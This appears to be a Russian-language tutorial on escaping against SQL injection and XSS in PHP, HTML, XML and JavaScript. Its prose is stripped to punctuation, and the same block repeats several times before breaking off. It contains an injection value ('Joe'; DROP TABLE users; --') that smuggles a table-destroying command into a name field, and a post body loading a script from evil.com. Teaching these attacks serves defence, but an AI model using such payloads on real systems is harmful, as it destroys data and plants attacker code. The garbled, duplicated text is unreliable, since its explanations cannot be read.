$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
